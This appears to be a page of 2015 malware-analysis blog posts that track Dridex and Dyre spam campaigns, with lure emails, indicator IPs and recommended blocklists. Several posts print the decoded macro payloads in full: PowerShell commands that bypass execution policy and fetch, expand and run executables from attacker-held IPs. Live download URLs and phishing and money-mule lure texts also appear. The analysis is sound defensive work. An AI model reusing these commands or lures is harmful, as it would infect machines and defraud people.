Something evil on 85.143.216.102 and 94.242.205.101

I will confess that I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on 94.242.205.101 (root SA, Luxembourg) [VT report] being reached via 85.143.216.102 (AirISP, Russia) [VT report].

Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:

dchsleep.com
manymike.com
vladeasa.com
ezdockparts.com
suurtampere.com
visikreatif.com
josemiguelez.com
reformapenal.com
axwaydropzone.com
capitolskopje.com
theantennapub.com
faceofsustengo.com
niagarajournal.com
crystalbeachhill.com
ezdockadirondacks.com
ezdockfingerlakes.com
chambel.info
lidifaria.info
ewwebinars.co
cybercoaching.co
ewwebinars.com
eyouthcounseling.com
ecounselingnation.com
epastoralcounseling.com
extraordinaryfamilies.com
drtim.net
drclinton.net
ewomencast.net
ecounseling.net
drtimclinton.net
ecouplecounseling.net
biblicalcoachingtoday.net
drclinton.org

For practical purposes though I recommend you block traffic to the IPs rather than the domains.

Recommended blocklist:
85.143.216.102
94.242.205.101

UPDATE:
These following nearby IPs have also been distributing badness. I recommend you block these too:
85.143.216.103
94.242.205.98

Malware spam: "Invoice ID:987654321 in attachment." from random senders

This spam has no body text and a randomly-generated sender name and invoice ID number. Sample subjects include:

Invoice ID:07dda8035 in attachment.
Invoice ID:09bf252 in attachment.
Invoice ID:108df399 in attachment.
Invoice ID:11847972 in attachment.
Invoice ID:156a35519 in attachment.
Invoice ID:16bb539 in attachment.
Invoice ID:16de0833 in attachment.
Invoice ID:17ff9887 in attachment.
Invoice ID:19b5b30 in attachment.

Sample senders:

Angelia Oliver
Annette Hunter
Austin Bennett
Belinda Cameron
Brittney Dixon
Buster Nolan
Candace Bowers
Christian Kemp
Clarissa Gentry
Cruz Mcintosh
Doug Haney
Dylan Poole
Erwin Hale
Gordon Downs
Hallie Neal
Oscar Bradshaw
Reyna Carver
Rosalie Acevedo
Sid Alston
Sophia Scott
Tanner Puckett
Tia Kline
Trudy Hensley
Valerie Delaney
Ivy Stokes
Jeanie Frye
Karin Frank
Kayla Travis
Mai Rowland
Marilyn Fleming
Minerva Glover

The Word document contains an embedded OLE object that leads to a malicious VBA macro. The payload is exactly the same as the one used in this attack.

Malware spam: "Aspiring Solicitors Debt Collection" has mystery XML attachment

This spam has a malicious attachment.

Date:    19 March 2015 at 12:52
Subject:    Aspiring Solicitors Debt Collection

Aspiring Solicitors

Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance:       2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.

You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.

Court Fees  GBP 245.00

Solicitors Costs  GBP 750.00

Cheques or Postal Orders should be  made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.

Yours faithfully,
Shawn Ballard
Aspiring Solicitors

Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
Brighton
BN1 3XJ
United Kingdom

Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indication are that this can run even with macros disabled. Each attachment has a unique MD5.

Analysis is currently pending, this appears to have several new techniques to avoid detection. According to this Twitter conversation one version attempts to download a binary from 91.226.93.51/smoozy/shake.exe although this is currently timing out for me. For security analysts, a sample of the XML file can be found here.

IMPORTANT: if you have opened this document in Word then there is a good chance that you are infected. I would recommend that you shut down any machine that has opened this. Anti-virus detections are currently very poor, but vendors may have signature available soon, I would wait 24 hours before attempting to disinfect any infected machine. Dridex collects banking passwords, so it is important that machines are not used for financial transactions.

UPDATE:

This particular attack uses some novel features. Opening the Word document reveals what appears to be an embedded XLS file:

There's some interesting metadata.. created by "Dredex" of "Ph0enix Team", then modified by "ПРроываААА".

In the typical attack scenario, opening the embedded file will force the macro to run. In this case, I used LibreOffice on a Linux box which does not support VBA. This revealed the malicious code, which looks like this.

A bit of copy-and-pasting reveals nothing more sophisticated than some Base 64 encoded text that attempts to run one of the following commands:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.199/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.226.93.51/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.227.18.76/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

FYI, those IPs are allocated as follows:

193.26.217.199 (Servachok Ltd, Russia)
91.226.93.51 (Sobis OOO, Russia)
91.227.18.76 (Eximius LLC, Russia)
176.31.28.244 (OVH, France / Bitweb LLC, Russia)

"shake.exe" has a VirusTotal detection rate of 3/57. Between that VirusTotal report and this Malwr report we can see the malware attempting to connect to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
87.236.215.105 (OneGbits, Lithuania)
31.160.233.212 (KPN Zakelijk Internet, Netherlands)

Further analysis is pending.

Recommended blocklist:
193.26.217.199
91.226.93.51
91.227.18.76
176.31.28.244
95.163.121.0/24
87.236.215.105
31.160.233.212

Malware spam: "sales@marflow.co.uk" / "Your Sales Order"

This spam run pretends to come from Marflow Engineering but it doesn't, instead it is a simple forgery. Marflow are not sending out this email, nor have their systems been compromised in any way.

From:    sales@marflow.co.uk
Date:    19 March 2015 at 09:13
Subject:    Your Sales Order

Your order acknowledgment is attached.

Please check carefully and advise us of any issues.

Best regards

Marflow

Attached is a file 611866.xls which appears to come in at least three different versions. But due to an error in the way the spam has been created, the attachment is actually corrupt and (depending on your version of Excel) attempting to open it gives this error:

The file you are trying to open, '611866.xls', is in a different format than specified by the file extension. Verify that the file is not corrupted and is from a trusted source before opening the file. Do you want to open the file now?

Clicking OK loads up what looks like gobbledegook.

If you see this, then you have had a lucky escape because the attachment is in the wrong format and is Base 64 encoded. If you manually run a Base 64 decoder against it then you end up with a malicious XLS file, in one of three different flavours with low detection rates [1] [2] [3] which in turn each contain a slightly different malicious macro [1] [2] [3] which then attempt to download from the following locations:

http://www.lenhausen.de/js/bin.exe
http://meostore.net/js/bin.exe
http://mvw1919.de/js/bin.exe

This is saved in the %TEMP% folder under the filenames pirit86.exe, tikapom64.exe and Trekaldo51.exe (although the binary is the same in each case). This malicious binary has a detection rate of just 2/57 and according to the Malwr report, it phone home to the following IPs:

37.139.47.81 (Pirix, Russia)
5.100.249.215 (OMC Computers & Communications, Israel)
195.162.107.7 (Gamma Telecom, UK)
131.111.37.221 (University of Cambridge, UK)
198.245.70.182 (Deniz Toprak, Turkey / B2 Net Solutions, US)
210.205.74.43 (DAEMINCUSTOM, Korea)
46.228.193.201 (Aqua Networks Ltd, Germany)

It also drops another version of the downloader, edg1.exe which has a detection rate of 1/56 and a DLL with a detection rate of also of 1/57. The payload is the Dridex banking trojan.

Recommended blocklist:
37.139.47.0/24
5.100.249.215
195.162.107.7
131.111.37.221
198.245.70.182
210.205.74.43
46.228.193.201

Malware spam: "JP Morgan Access [Carrie.Tolstedt@jpmorgan.com]" / "FW: Customer account docs"

This fake financial spam comes with a malicious attachment.

---

From:    JP Morgan Access [Carrie.Tolstedt@jpmorgan.com]
Date:    18 March 2015 at 17:49
Subject:    FW: Customer account docs

We have received the following documents regarding your account, if you would like to confirm the changes please check / view the documents please click here. Carrie L. Tolstedt Carrie.Tolstedt@chase.com Senior Executive Vice President Community Banking J.P. Morgan Treasury and Securities Services This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.

---

As it happens, Carrie L Tolstedt is a real executive... at Wells Fargo. The lady in the picture is another Wells Fargo employee entirely.

But anyway, this is a simple forgery containing a link to a file at Cubby which downloads as Documents_JP3922PV8.zip and contains a malicious file Documents_JP3922PV8.exe which has a icon to make it look like an Adobe acrobat file.

The executable has a low VirusTotal detection rate of 3/57.  Various automated analysis tools [1] [2] [3] [4] show the malware downloading additional components from:

bej-it-solutions.com/pvt/ixusn.rtf
capslik.com/mandoc/ixusn.rtf

It then attempts to POST data to an IP at 109.230.131.95 (Vsevnet Ltd. Russia) which is a critical IP to block if you want to protect yourself against this type of Upatre / Dyre attack.

The Malwr report also shows that amongst other things it downloads an executable lwxzqrk36.exe which has a detection rate of just 2/57. That Malwr report also shows that it downloads and pops up a PDF about drone strikes.

Source: malwr.com

Presumably this PDF pops up to make the victim think that they have been duped into opening some politically-themed spam. Instead, they have actually installed the Dyre banking trojan.. in other words, the victim may well think that it is nothing serious when it really is.

The download locations for this Upatre/Dyre combination change all the time, but the IP address of 109.230.131.95  has been around for a little while. Also, it is a characteristic of this malware that it calls out to checkip.dyndns.org to determine the client IP address.. monitoring for traffic going to that location can be a useful indicator of infection.


ssssssssssss

Malware spam: "Your online Gateway.gov.uk Submission"

This spam leads to a malicious ZIP file hosted either on Dropbox or Cubby.

From:    Gateway.gov.uk
Date:    18 March 2015 at 13:19
Subject:    Your online Gateway.gov.uk Submission

Electronic Submission Gateway

Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.

To view/download your form to the Government Gateway please visit http://www.gateway.gov.uk/file/s/gdvzk7toum8ghnc/SecureDocument.zip?dl=1

This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.

gov.uk - the best place to find government services and information - Opens in new window

The best place to find government services and information

The link leads to an archive file Avis_De_Paiement.zip which in turn contains a malicious binary Avis_De_Paiement.scr which has a VirusTotal detection rate of 16/57. ThreatExpert and Comodo CAMAS report that it downloads components from the following locations:

canabrake.com.mx/css/doc11.rtf
straphael.org.uk/youth2000_files/doc11.rtf

My sources indicate that this most likely phones home to 109.230.131.95 (Vsevnet Ltd. Russia) which is a known bad IP that I recommend blocking. The payload appears to be the Upatre downloader leading to the Dyre banking trojan.

Malware spam: "December unpaid invoice notification"

This spam comes with no body text, but does come with a malicious attachment.

From:    Korey Mack
Date:    18 March 2015 at 11:04
Subject:    December unpaid invoice notification

So far I have only seen a single sample with an attached file called 11IDJ325.doc which is undetected by AV vendors. Inside is a malicious macro [pastebin] with an encrypted section that executes this:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\huiUGI8t8dsF.cab'); expand %TEMP%\huiUGI8t8dsF.cab %TEMP%\huiUGI8t8dsF.exe; start %TEMP%\huiUGI8t8dsF.exe;

Although the EXE file from 176.31.28.244 (OVH, France / Bitweb LLC, Russia) is downloaded as a CAB file and then EXPANDed to an EXE, there is in fact no file transformation happening at all (which is odd). This executable has a detection rate of 2/57.

This Malwr report shows it downloading a DLL with an MD5 of a40e588e614e6a4c9253d261275288bf [VT 4/57] which is the same payload as found in this earlier spam run, along with another executable with an MD5 of 409397f092d3407f95be42903172cf06 which is not in the VirusTotal database. The report also shows the malware phoning home to the following IPs:

31.25.77.154 (Call U Communications, Palestine)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
188.165.5.194 (OVH, Ireland)
188.165.26.237 (OVH, Latvia)
115.241.60.56 (Reliance Communication, India)
46.19.143.151 (Private Layer INC, Switzerland)

Recommended blocklist:
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244

Malware spam: "Confirmation of Booking" / "NWN Media Ltd" / "Della Richardson"

This spam is not from NWN Media Ltd but is instead a simple forgery sent out to random email addresses with a malicious attachment. NWN Media are not responsible for this spam, nor have their systems been compromised.

From:    della.richards2124@nwn.co.uk [della.richards@nwn.co.uk]
Date:    18 March 2015 at 08:34
Subject:    Confirmation of Booking

This booking confirmation forms a binding contract between yourselves and NWN Media Ltd.
If you do not agree with any of the details above then please contact the named sales representative on the above number immediately.


Yours sincerely,

Della
NWN Media Ltd

Attached is a file NWN Confirmation Letter.doc which I have so far seen in two different versions, both with low detection rates [1] [2] which contain slightly different malicious macros [1] [2] which then go and download a malicious binary from one of the following locations:

http://pmmarkt.de/js/bin.exe
http://deosiibude.de/deosiibude.de/js/bin.exe

These are saved as %TEMP%\zakilom86.exe and %TEMP%\Pikadlo64.exe respectively. The binaries are actually identical and have a VirusTotal detection rate of 5/57. According to the Malwr report this binary attempts to communicate with the following IPs:

31.41.45.211 (Relink Ltd, Russaia)
109.234.159.250 (Selectel Ltd, Russia)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud / IT House, Russia)
95.163.121.200 (Digital Networks CSJC aka DINETHOSTING / Russia)

It then drops what appears to be another version of itself called edg1.exe onto the target system [VT 2/55] along with a malicious Dridex DLL [VT 3/55]

Recommended blocklist:
31.41.45.211
109.234.159.250
37.59.50.19
62.76.179.44
95.163.121.0/24

Quttera fails and spews false positives everywhere

By chance, I found out that my blog had been blacklisted by Quttera. No big deal, because it happens from time-to-time due to the nature of the content on the site. But I discovered that it isn't just my blog, but Quttera also block industry-leading sites such as Cisco, VMWare, Sophos, MITRE, AVG and Phishtank.

For example, at the time of writing the following domains are all blacklisted by Quttera (clicking the link shows the current blacklisting status):

www.cisco.com
www.vmware.com
cve.mitre.org
www.auscert.org.au
www.phishtank.com
www.buzzfeed.com
www.reddit.com
dl.dropbox.com
www.avg.com
www.malekal.com
nakedsecurity.sophos.com
blog.dynamoo.com
malware-traffic-analysis.net
blog.malwaremustdie.org

Cisco's blacklisting entry looks like this:

Now, you can ask Quttera to unblacklist your site for free by raising a ticket but the most prominent link leads to a paid service for £60/year. Hmmm.

I don't think that I will rush to subscribe to that. Obviously, something is seriously wrong with the algorithm in use, some of these sites should obviously be whitelisted. Quttera also doesn't understand the different between a malicious domain or IP being mentioned and such a site being linked to or injected into a site.

I guess there are many, many more domains that are in a similar situation. Perhaps you might want to check your own web properties and share your findings in the comments?

Malware spam: "Invoice (13\03\2015) for payment to COMPANY NAME"

There is a series of malware spams in progress in the following format:

Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC

Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc which I have seen three different variants of (although one of those was zero length), one of which was used in this spam run yesterday and one new one with zero detections which contains this malicious macro, which downloads another component from:

http://95.163.121.186/api/gbb1.exe

This is saved as %TEMP%\GHjkdfg.exe - incidentally, this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53 and the Malwr report shows it phoning home to 95.163.121.33 which is also in the same network neighbourhood.

The binary also drops a malicious Dridex DLL with a detection rate of 5/56. This is the same DLL as used in this spam run earlier today.

Recommended blocklist:
95.163.121.0/24

Malware spam: "pentafoods.com" / "Invoice: 2262004"

This fake Penta Foods spam run is another variant of this and it comes with a malicious attachment. Penta Foods are not sending this email, instead it is a simple forgery.

From:    cc18923@pentafoods.com
Date:    13 March 2015 at 07:50
Subject:    Invoice: 2262004

Please find attached invoice :  2262004
  Any queries please contact us.

--
Automated mail message produced by DbMail.
Registered to Penta Foods, License MBA2009357.

Attached is a Word document R-1179776.doc which actually comes in two version, both with zero detection rates, contains one of two malicious macros [1] [2] which then download a component from the following locations:

http://accalamh.aspone.cz/js/bin.exe
http://awbrs.com.au/js/bin.exe

This is saved as %TEMP%\fJChjfgD675eDTU.exe and has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] show a phone-home attempt to:

62.76.179.44 (Clodo-Cloud / IT House, Russia)

My sources also indicate that it phones home to:

212.69.172.187 (Webagentur, Austria)
78.129.153.12 (iomart / RapidSwitch, UK)

According to this Malwr report it also drops a DLL with a detection rate of just 2/57 which is probably Dridex.

Recommended blocklist:
62.76.179.44
212.69.172.187
78.129.153.12

Malware spam: "Invoice [1234XYZ] for payment to COMPANY NAME"

These rather terse emails appear to refer to various companies, and all come with a malicious attachment:

From:    Erasmo Small
Date:    12 March 2015 at 09:40
Subject:    Invoice [3479XZM] for payment to INCOME & GROWTH VCT PLC(THE)

From:    Eli Ramirez
Date:    12 March 2015 at 08:37
Subject:    Invoice [4053FJK] for payment to RANDGOLD RESOURCES

From:    Richard Baxter
Date:    12 March 2015 at 08:37
Subject:    Invoice [3020JQM] for payment to TARSUS GROUP PLC

From:    Megan Dennis
Date:    12 March 2015 at 09:36
Subject:    Invoice [4706CEZ] for payment to SHANKS GROUP

The attachment is a Word document with a name that matches the reference in the subject. So far, I have seen two different versions of this with low detection rates [1] [2] which contain these malicious macros [1] [2] [pastebin] which contain some quite entertaining obfuscation, but when deobfuscated try to download an additional component from the following locations:

https://92.63.88.102/api/gb1.exe
https://85.143.166.124/api/gb1.exe

Note the use of HTTPS. Those two IP addresses belong to:

92.63.88.102 (MWTV, Latvia)
85.143.166.124 (Pirix, Russia)

Both are well-known hosts for this sort of rubbish. According to the Malwr report this attempts to phone home to:

95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)

Digital Networks is also a sea of crap. It also drops a Dridex DLL with a detection rate of 9/57.

Recommended blocklist:
95.163.121.0/24
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
85.143.166.0/24

Malware spam: "Voicemail Message (07813297716) From:07813297716"

When was the last time someone sent you a voice mail message by email? Never? There are no surprises to find that this spam email message has a malicious attachment.

From:     Voicemail admin@victimdomain
Date:     11/03/2015 11:48
Subject:     Voicemail Message (07813297716) From:07813297716

IP Office Voicemail redirected message

Attachment: MSG00311.WAV.ZIP

The attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57. According to the Malwr report, it pulls down another executable and some config files from:

http://wqg64j0ei.homepage.t-online.de/data/log.exe
http://cosmeticvet.su/conlib.php

This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicous macros rather than EXE-in-ZIP attacks.

The executable it drops has a detection rate of 2/54 and these Malwr reports [1] [2] show a further component download from:

http://muscleshop15.ru/js/jre.exe
http://test1.thienduongweb.com/js/jre.exe

This component has a detection rate of 5/57. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57 which is the same Dridex binary we've been seeing all day.

Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:

31.41.45.211 (Relink Ltd, Russia)
62.213.67.115 (Caravan Telecom, Russia)
80.150.6.138 (Deutsche Telekom, Germany)
42.117.1.88 (FPT Telecom Company, Vietnam)
188.225.77.242 (TimeWeb Co. Ltd., Russia)
212.224.113.144 (First Colo GmbH, Germany)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
185.25.150.33 (NetDC.pl, Poland)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)

Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.3
104.232.32.119
188.120.243.159

Malware spam: Message from "RNP0026735991E2" / "inv.09.03"

This pair of spam emails are closely related and have a malicious attachment:

From:    admin.scanner@victimdomain
Date:    11 March 2015 at 08:49
Subject:    Message from "RNP0026735991E2"

This E-mail was sent from "RNP0026735991E2" (MP C305).

Scan Date: 11.03.2015 08:57:25 (+0100)
Queries to: admin.scanner@victimdomain

Attachment: 201503071457.xls

----------

From:    Jora Service [jora.service@yahoo.com]
Date:    11 March 2015 at 09:27
Subject:    inv.09.03

Attachment: INV 86-09.03.2015.xls

Neither XLS attachment is currently detected by AV vendors [1] [2] and they contain two related but slightly different macros [1] [2] which download a component from the following locations:

http://koschudu.homepage.t-online.de/js/bin.exe
http://03404eb.netsolhost.com/js/bin.exe

The file is then saved as %TEMP%\fJChjfgD675eDTU.exe  which has a VirusTotal detection rate of 3/57. According to this Malwr report, it attempts to connect to the following IPs:

188.225.77.216 (TimeWeb Co. Ltd, Russia)
42.117.1.88 (FPT Telecom Company, Vietnam)
31.41.45.211 (Relink Ltd, Russia)
87.236.215.103 (OneGbits, Lithuania)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)

It also drops a couple more malicious binaries with the following MD5s:

8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
53ba28120a193e53fa09b057cc1cbfa2 [VT 4/57]

Recommended blocklist:
188.225.77.216
42.117.1.88
31.41.45.211
87.236.215.103
104.232.32.119
188.120.243.159

Malware spam: BACS "Remittance Advice" / HMRC "Your Tax rebate"

These two malware spam runs are aimed at UK victims, pretending to be either a tax rebate or a BACS payment.

From:    Long Fletcher
Date:    11 March 2015 at 09:44
Subject:    Remittance Advice

Good Morning,

Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.

Please note this may show on your account as a payment reference of FPALSDB.

Kind Regards
Long Fletcher
Finance Coordinator


Attachment: LSDB.xls

----------

From:    Vaughn Baker
Date:    11 March 2015 at 09:27
Subject:    Your Remittance Advice [FPABHKZCNZ]

Good Morning,

Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.

Please note this may show on your account as a payment reference of FPABHKZCNZ.

Kind Regards
Vaughn Baker
Senior Accountant

----------

From:    HMRC
Date:    11 March 2015 at 10:04
Subject:    Your Tax rebate

Dear [redacted],

After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.

To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).

Regards, HM Revenue Service. We apologize for the inconvenience.

The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved

Sample attachment names:

HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)

All of these documents have low detection rates [1] [2] [3] [4] and contain these very similar malicious macros (containing sandbox detection algorithms) [1] [2] [3] [4] which when decrypted attempt to run the following Powershell commands:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

These are probably compromised hosts, for the record they are:

193.26.217.39 (Servachok Ltd, Russia)
93.170.123.36 (PE Gornostay Mikhailo Ivanovich, Ukraine)
85.143.166.190 (Pirix, Russia)
46.30.42.177 (EuroByte / Webazilla, Russia)

These download a CAB file, and then expand and execute it. This EXE has a detection rate of 4/57 and automated analysis tools [1] [2] show attempted traffic to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
188.120.226.6 (TheFirst.RU, Russia)
188.165.5.194 (OVH, France)

According to this Malwr report it drops two further malicious files with the following MD5s:

c6cdf73eb5d11ac545f291bc668fd7fe
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]

Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177

Fake job offer: jobinituk.com / jobsinits.com / workincroatia.com

This spammed out "job offer" is actually an attempt to recruit people into criminal money laundering.

Date:    6 March 2015 at 21:00
Subject:    Hello

Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.

Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.

We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.

Part-time employment is currently important.
We offer a wage from 3100 GBP per month.

If you are interested in our offer, mail to us your answer on andonis@jobinituk.com and
we will send you an extensive information as soon as possible.
Respectively submitted

Personnel department

There are four related domains:

jobinituk.com
jobsinits.com
workincroatia.com
sati-haus.net

If you receive a job offer soliciting replies to one of these domains, then the job offer is bogus. If you were to accept it, you could well be liable to repay back the money you helped launder, or even face arrest or jail time.

UPDATE: There is a second version of the spam circulating..

Date:    9 March 2015 at 15:23
Subject:    Offer

If you have
- excellent administrative skills
- knowledge of Microsoft Office
- a keen eye for details

If you
- present yourself well
- can understand and execute instructions

If you are
- a team player with the ability to work independently
- organized
- reliable and punctual person
- determined to work hard and succeed

Then We need you in Our Advertising Company!

Please email us for details of the job: Benito@jobinituk.com

Malware spam: "Mick George Invoice 395687" / "Mick George Invoicing [mginv@mickgeorge.co.uk]"

This malformed spam is meant to have a malicious attachment:

From:    Mick George Invoicing [mginv@mickgeorge.co.uk]
Date:    6 March 2015 at 09:29
Subject:    Mick George Invoice 395687


Please find attached a copy of your invoice 395687.

If you have any queries regarding the invoice, please do not hesitate to co=
ntact us by emailing mginv@mickgeorge.co.uk<mailto:mginv@mickegeorge.co.uk>=
 or calling our finance department on 01480 499125.

Regards

Finance Team
MICK GEORGE[http://mickgeorgeskips.co.uk/wp-content/uploads/2014/08/image00=
1.jpg] (r)
T: 01480 499125
F: 01480 498077
www.mickgeorge.co.uk<http://www.mickgeorge.co.uk/>

Lancaster House, Meadow Lane, St Ives, Cambs, PE27 4YQ  [http://mickgeorges=
kips.co.uk/wp-content/uploads/2014/08/image003.jpg] <https://plus.google.co=
m/109160871896788819541/posts>    [http://mickgeorgeskips.co.uk/wp-content/=
uploads/2014/08/image004.jpg] <https://twitter.com/mickgeorgeltd>

Specialists in Earthworks * Aggregates * Skip Hire * Contaminated Land Serv=
ices & Remediation * Demolition * Contracting

Waste Management & Recycling * Landfill & Tipping Facilities * Asbestos Rem=
oval * Ready Mix Concrete & Floor Screeds

[Concrete signature]<http://mickgeorgeskips.co.uk/wp-content/uploads/2014/0=
8/Concrete-signature.jpg>

Disclaimer

This email and any attachments are intended only for the use of the individ=
ual or entity to which it is directed and may contain information that is p=
rivileged, confidential and exempt from disclosure under applicable law.

If you have received this email and you are not the intended recipient or t=
he employee or agent responsible for delivering this email to the intended =
recipient, please inform Mick George on +44 (0)1480 498099 and then delete =
the email from your system. If you are not a named addressee you must not u=
se, disclose, disseminate, distribute, copy, print or reply to this email.

Although Mick George Ltd routinely screens for viruses, addressees should s=
can this email and any attachments for viruses. Mick George Ltd makes no re=
presentation or warranty as to the absence of viruses in this email or any =
attachments. Please note for the protection of our clients and business, we=
 may monitor and read emails sent to and from our server(s).

Mick George Ltd

Something has gone wrong with the formatting, it is meant to look like this:

Please find attached a copy of your invoice 395687.
If you have any queries regarding the invoice, please do not hesitate to contact us by emailing mginv@mickgeorge.co.uk or calling our finance department on 01480 499125.
Regards
Finance Team
MICK GEORGE ®
T: 01480 499125
F: 01480 498077
www.mickgeorge.co.uk

Lancaster House, Meadow Lane, St Ives, Cambs, PE27 4YQ

Specialists in Earthworks • Aggregates • Skip Hire • Contaminated Land Services & Remediation • Demolition • Contracting
Waste Management & Recycling • Landfill & Tipping Facilities • Asbestos Removal • Ready Mix Concrete & Floor Screeds

Disclaimer
This email and any attachments are intended only for the use of the individual or entity to which it is directed and may contain information that is privileged, confidential and exempt from disclosure under applicable law.
